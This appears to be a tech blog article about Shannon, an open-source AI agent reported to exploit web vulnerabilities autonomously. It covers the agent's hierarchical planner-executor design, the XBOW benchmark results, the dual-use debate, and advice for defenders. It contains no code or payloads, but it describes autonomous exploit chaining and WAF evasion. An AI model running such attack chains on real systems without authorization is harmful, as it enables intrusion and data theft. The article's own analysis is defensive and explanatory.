Photo by ThisIsEngineering on Pexels (free license) Source

An open-source AI agent now exploits web application vulnerabilities with a 96% success rate on the XBOW benchmark, a standardized test suite of real-world web exploitation challenges. Shannon, built by Keygraph, does not assist a human pentester. It runs the entire attack chain autonomously: reconnaissance, vulnerability identification, payload generation, exploitation, and verification. No human in the loop. XBOW’s own proprietary agent scored 86% on the same benchmark. An open-source project beat the benchmark creator’s own tool by 10 percentage points.

That gap matters. When the best publicly available exploitation agent outperforms commercial alternatives, the economics of web application security change permanently. Anyone who can clone a GitHub repo and run a Python script now has access to exploitation capabilities that required years of specialist training six months ago.

Related: AI Pentesting Agents: Can Autonomous Red Teams Replace Human Hackers?

How Shannon Works: Hierarchical Agents, Not Prompt Engineering

Shannon is not a wrapper around ChatGPT with a “hack this website” prompt. It uses a hierarchical multi-agent architecture, the same design pattern that XBOW’s own research identified as critical for effective autonomous exploitation.

The Planner-Executor Split

At the top sits a planner agent, an LLM-powered orchestrator that decomposes a target into an attack strategy. Below it, specialized executor sub-agents handle specific tasks: one browses web pages and analyzes HTML, another sends HTTP requests and interprets responses, a third generates and mutates exploit payloads.

The planner maintains state across the entire attack chain. When the XSS payload gets filtered, it does not start over. It tells the payload sub-agent to try a different encoding while the browser sub-agent maps out alternative injection points. This is the same observe-reason-act loop that makes agentic AI frameworks effective in other domains, applied to offensive security.

Why Hierarchical Beats Monolithic

XBOW’s own research confirms why this matters. A single monolithic agent struggles with multi-step exploits because it loses context. By the time it has enumerated 40 endpoints and tested 200 payloads, the conversation window is saturated. The hierarchical design solves this: the planner holds the strategic context while sub-agents handle tactical execution with fresh context windows.

The practical result: Shannon chains vulnerabilities. It finds an SSRF, uses it to access internal services, discovers a SQL injection on an internal endpoint, and extracts data. Multi-step exploitation that would take a junior pentester hours happens in minutes.

What Shannon Actually Exploits

The XBOW benchmark covers the vulnerability classes that matter in production: SQL injection (union-based, blind, time-based), cross-site scripting (reflected, stored, DOM-based), server-side request forgery, authentication bypasses, file inclusion and upload vulnerabilities, and command injection. Shannon handles Level 1 single-step exploits and Level 2 multi-step chains that require combining multiple vulnerabilities in sequence.

96% across these categories means Shannon misses roughly 1 in 25 challenges. The 4% it fails on tends to involve novel vulnerability classes or heavily customized application logic that does not match patterns the LLM has seen in training data.

Related: OWASP Top 10 for Agentic Applications: Every Risk Explained with Real Attacks

The XBOW Benchmark: Why These Numbers Matter

The XBOW benchmark is not a CTF competition with puzzle-like challenges. XBOW deploys realistic web applications with known vulnerabilities as live targets. The agent gets a URL and a goal. No hints, no source code access (in the “hint-free, source-aware” configuration), no hand-holding.

Benchmark Structure

XBOW organizes challenges into escalating difficulty levels. Level 1 tests single-step exploitation: find the SQL injection input, craft the payload, extract the flag. Level 2 requires chaining: discover an authentication bypass, use the elevated access to find an SSRF, pivot to an internal service, exploit a deserialization vulnerability there. Each level adds complexity that breaks less sophisticated agent architectures.

How Shannon Stacks Up

AgentXBOW ScoreTypeArchitecture
Shannon (Keygraph)96%Open sourceHierarchical multi-agent
XBOW Agent86%ProprietaryHierarchical multi-agent
XBOW (HackerOne #1)1,000+ vulnsProprietaryProduction bug bounty

XBOW’s own agent reached #1 on the HackerOne global leaderboard by finding over 1,000 vulnerabilities across real bug bounty programs, including a previously unknown vulnerability in Palo Alto Networks’ GlobalProtect VPN. Shannon’s higher benchmark score does not necessarily mean it would outperform XBOW on live targets, but it shows the open-source community can match proprietary research at the architecture level.

Context: The Broader AI Pentesting Market

Shannon enters a crowded space. Horizon3.ai’s NodeZero has run over 225,000 autonomous pentests with 5,200+ customers and 102% ARR growth. Pentera launched “Vibe Red Teaming” with natural language test direction. RunSybil raised $40M for continuous autonomous pentesting. Stanford’s ARTEMIS agent outperformed 9 of 10 human pentesters on a live university network at $18/hour.

What makes Shannon different: it is fully open source. You can read every line of code, understand the prompts, modify the agent architecture, and run it on your own infrastructure. No enterprise sales call required.

Open Source Offensive AI: The Dual-Use Problem

Shannon’s release reopens a debate that the security community has never resolved. Metasploit, Burp Suite, and nmap all started as tools that could be used for attack or defense. Shannon follows the same pattern, but the barrier to effective use is lower. Running Metasploit requires understanding exploitation concepts. Running Shannon requires a GitHub account and API keys.

The Case For Open Sourcing

Keygraph’s argument follows established precedent: defenders need to understand attacker capabilities. If a 96%-accurate autonomous exploitation agent exists, organizations need to test their defenses against it. Keeping it proprietary just means attackers build their own while defenders stay blind.

Open source also enables verification. When XBOW publishes a benchmark score, the community can reproduce it. When a vendor claims “AI-powered vulnerability detection,” Shannon provides a concrete comparison point. The code is the claim.

The Case Against

The counterargument is equally straightforward. Before Shannon, building an autonomous exploitation agent required significant ML engineering expertise, access to training data, and months of development. Now it requires git clone. The skills barrier that kept autonomous exploitation in the hands of well-funded research labs and state actors has evaporated.

Reddit’s r/netsec community raised valid concerns: the XBOW benchmark, while realistic, is still a controlled environment. Production web applications have WAFs, rate limiting, CAPTCHAs, and monitoring that the benchmark does not replicate. Shannon’s 96% in the lab might translate to significantly less in the wild. But “significantly less than 96%” is still a lot.

Regulatory Implications

The EU AI Act classifies AI systems by risk level. An autonomous exploitation tool operating without human oversight could fall under high-risk or even prohibited categories depending on how it is deployed. Organizations using Shannon for internal pentesting would need to document its use under Article 6 risk management obligations. Using it against targets without explicit authorization remains straightforwardly illegal under the Computer Fraud and Abuse Act (US) and Section 202a StGB (Germany).

Related: AI Agents in Cybersecurity: Offense, Defense, and the Arms Race
Related: MITRE ATLAS Adds 14 Agentic AI Attack Techniques, and Your SOC Needs All of Them

What This Means for Your Web Application Security

If you run web applications, the calculus just changed. The question is no longer “will someone skilled enough find our SQL injection?” It is “will someone run an open-source script that finds it automatically?”

Immediate Actions

Run Shannon against your own applications. If an open-source tool with zero customization finds vulnerabilities, attackers will too. This is the most direct way to understand your exposure. Keygraph provides setup instructions for running Shannon in a controlled environment.

Assume your WAF is insufficient. Shannon generates exploit payloads iteratively, mutating them until they bypass filters. Static WAF rules that block known payloads do not stop an agent that generates novel variations. Invest in behavioral detection that identifies exploitation patterns regardless of payload encoding.

Shift to continuous testing. Annual pentests made sense when exploitation required human experts billing $200/hour. When the same coverage costs API credits, there is no reason not to run automated exploitation testing weekly or after every deployment.

Monitor for autonomous scanning. Shannon’s traffic patterns differ from traditional vulnerability scanners. It does not blast thousands of identical requests. It sends targeted, contextually appropriate requests that adapt based on responses. Your detection rules need to account for this.

The Bigger Picture

DARPA’s AI Cyber Challenge (AIxCC) demonstrated that AI can both find and fix vulnerabilities. XBOW’s own autofix capability shows the same dual use in practice: the same agent architecture that discovers a SQL injection can generate the parameterized query that patches it. The future is not “AI breaks everything.” It is “AI breaks and fixes faster than humans on both sides.”

Shannon is named after Claude Shannon, the father of information theory. The original Shannon proved that any communication channel has a maximum reliable throughput. The AI Shannon is proving something similar about web security: every web application has a maximum achievable security posture, and autonomous agents are converging on it from both the attack and defense sides simultaneously.

Frequently Asked Questions

What is Shannon AI and how does it work?

Shannon is an open-source autonomous AI agent built by Keygraph that finds and exploits web application vulnerabilities without human intervention. It uses a hierarchical multi-agent architecture with a planner agent that decomposes attacks into subtasks and specialized executor sub-agents that handle browsing, HTTP requests, and payload generation. It achieved a 96% success rate on the XBOW benchmark.

What is the XBOW benchmark for AI hacking agents?

The XBOW benchmark is a standardized test suite that measures AI agents’ ability to autonomously discover and exploit real-world web application vulnerabilities. It deploys realistic web applications with known vulnerabilities (SQL injection, XSS, SSRF, authentication bypasses, etc.) as live targets. Challenges are organized into escalating difficulty levels, from single-step exploits to multi-step vulnerability chains.

Shannon is legal to use for authorized security testing on systems you own or have explicit written permission to test. Using it against systems without authorization is illegal under the Computer Fraud and Abuse Act (US), Section 202a StGB (Germany), and equivalent laws in most jurisdictions. Organizations using Shannon for internal pentesting under the EU AI Act may need to document its use under Article 6 risk management obligations.

How does Shannon compare to commercial AI pentesting tools?

Shannon scored 96% on the XBOW benchmark, compared to XBOW’s own proprietary agent at 86%. Commercial platforms like Horizon3.ai NodeZero and Pentera offer broader coverage (network, Active Directory, not just web apps), enterprise integrations, and compliance reporting. Shannon’s advantage is that it is fully open source, free, and web-application-focused. Its disadvantage is the lack of enterprise features, support, and broader attack surface coverage.

What vulnerabilities can Shannon find autonomously?

Shannon autonomously discovers and exploits SQL injection (union-based, blind, time-based), cross-site scripting (reflected, stored, DOM-based), server-side request forgery (SSRF), authentication and authorization bypasses, file inclusion and upload vulnerabilities, and command injection. It can chain multiple vulnerabilities in sequence for multi-step exploitation.